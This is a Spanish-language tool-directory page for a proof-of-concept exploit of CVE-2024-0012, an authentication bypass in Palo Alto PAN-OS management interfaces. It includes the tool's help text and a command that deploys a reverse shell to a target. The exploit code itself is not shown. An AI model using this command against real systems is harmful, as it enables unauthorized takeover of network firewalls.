Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-0012 — CVE-2024-0012 PAN-OS: Bypass de autenticación en la interfaz web de gestión (PAN-SA-2024-0015) RCE POC | Kitploit
Herramientas/GitHubGitHub/0xjessie21/cve-2024-0012
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAutenticación
GitHub0xjessie21/cve-2024-0012

CVE-2024-0012

CVE-2024-0012 PAN-OS: Bypass de autenticación en la interfaz web de gestión (PAN-SA-2024-0015) RCE POC

Ver Repositorio
313hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Python 3.x

CVE-2024-0012

CVE-2024-0012 es una omisión de autenticación en el software PAN-OS de Palo Alto Networks que permite a un atacante no autenticado con acceso de red a la interfaz web de gestión obtener privilegios de administrador de PAN-OS para realizar acciones administrativas, manipular la configuración o explotar otras vulnerabilidades de escalada de privilegios autenticadas.

Captura de pantalla

cve-2024-0012

❗ Descargo de responsabilidad
Este proyecto está construido principalmente para ser utilizado como una herramienta CLI independiente. Ejecutar este exploit como un servicio puede presentar riesgos de seguridad. Se recomienda usarlo con precaución y medidas de seguridad adicionales. DWYOR

Uso

root@kitploit:~
python3 cve-2024-0012.py -h

Esto mostrará la ayuda de la herramienta. Aquí están todos los modificadores que soporta.

root@kitploit:~
Usage:
  python3 cve-2024-0012.py [flags]

Flags:
  -h, --help         show this help message and exit
  --url URL          Target base URL (http:// or https://)
  --no-verify        Disable SSL verification
  --timeout TIMEOUT  Request timeout in seconds
  --command COMMAND  Command to execute on the target
  --reverse-shell    Deploy a reverse shell to the target
  --lhost LHOST      Local host for reverse shell connection (required for reverse shell)
  --lport LPORT      Local port for reverse shell connection (required for reverse shell)

Comando de shell inversa.

root@kitploit:~
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
  • Reemplace 4444 con el puerto que esté usando.

Créditos

  • Chirag Artani
  • Sachin Artani
  • Muhammad Mugni Abdul Gani
Descargar herramienta